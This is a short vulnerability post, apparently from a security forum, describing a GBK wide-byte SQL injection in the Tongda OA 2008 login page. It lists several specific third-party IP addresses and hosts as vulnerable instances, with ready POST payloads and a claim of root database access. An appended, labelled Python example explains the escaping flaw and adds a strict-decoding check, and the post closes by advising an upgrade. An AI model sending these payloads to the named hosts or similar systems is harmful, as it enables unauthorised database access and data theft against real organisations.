Generic SQL injection in a Tongda OA system (with injection technique)
I have recently been learning SQL injection.
In fact, it's only common. Is there an error-based injection to verify the version?
Office Anywhere 2008 network smart office system
MySQL + Windows + PHP
Instances:
http://219.139.134.9:70/logincheck.php
http://www.ccas.com.cn:8008/logincheck.php
http://122.144.134.79/logincheck.php
For the three above (explicit error), POST:
PASSWORD=g00dPa%24%24w0rD&UNAME=%bf%27
http://123.233.240.119/logincheck.php (HTTP header injection exists)
http://61.175.246.20/logincheck.php (sqlmap --level=2)
For the two above (no explicit error), POST:
PASSWORD=g00dPa%24%24w0rD&submit=%b5%c7%20%c2%bc&UI=0&UNAME=%bf%27
If all 2008 versions are affected, changing the parameter slightly is enough to get to the database as root.
Appendix: why is the parameter %bf%27?
When MySQL uses GBK encoding, it treats %df%5c as a single wide character, namely "運" (borrowing the explanation from XEYES).
%bf works the same way: the %27 that follows %bf triggers the wide-byte handling. The backslash (%5c) that escaping puts in front of the quote is absorbed into the wide character, and the single quote that is left causes the SQL error.
If it is %bf'%bf%22, sqlmap cannot run it, so don't count on the scanner.
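The appendix's byte-level reasoning, as an added example that is not part of the original post or of Tongda OA's code. It assumes a simplified byte-wise escaper in the style of PHP's addslashes; the function names are hypothetical and the inputs are constructed. It also shows a defensive check: the raw value %bf%27 is not well-formed GBK, so it can be rejected before any SQL is built.

```python
from urllib.parse import unquote_to_bytes

def escape_bytes(raw: bytes) -> bytes:
    """Charset-unaware escaping: put a backslash before ', " and \\ (simplified)."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C):
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def quote_survives(raw: bytes, charset: str) -> bool:
    """True if a quote is left unescaped once the escaped bytes are read
    as text in `charset` (the way the database connection interprets them)."""
    text = escape_bytes(raw).decode(charset, errors="replace")
    i = 0
    while i < len(text):
        if text[i] == "\\":
            i += 2            # backslash plus the character it escapes
            continue
        if text[i] in "'\"":
            return True       # quote with no backslash in front of it
        i += 1
    return False

def is_well_formed(raw: bytes, charset: str = "gbk") -> bool:
    """Defensive check: accept only values that decode strictly in `charset`."""
    try:
        raw.decode(charset)
        return True
    except UnicodeDecodeError:
        return False

if __name__ == "__main__":
    uname = unquote_to_bytes("%bf%27")           # constructed: the page's UNAME value
    print(escape_bytes(uname).hex())             # bf5c27: backslash sits after 0xbf
    print(quote_survives(uname, "gbk"))          # 0xbf5c becomes one wide character
    print(quote_survives(uname, "latin-1"))      # single-byte charset keeps the escape
    print(is_well_formed(uname))                 # 0x27 is not a valid GBK trail byte
```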
Solution:
Upgrade to the 2013 version.
In the 2013 version, %bf no longer works.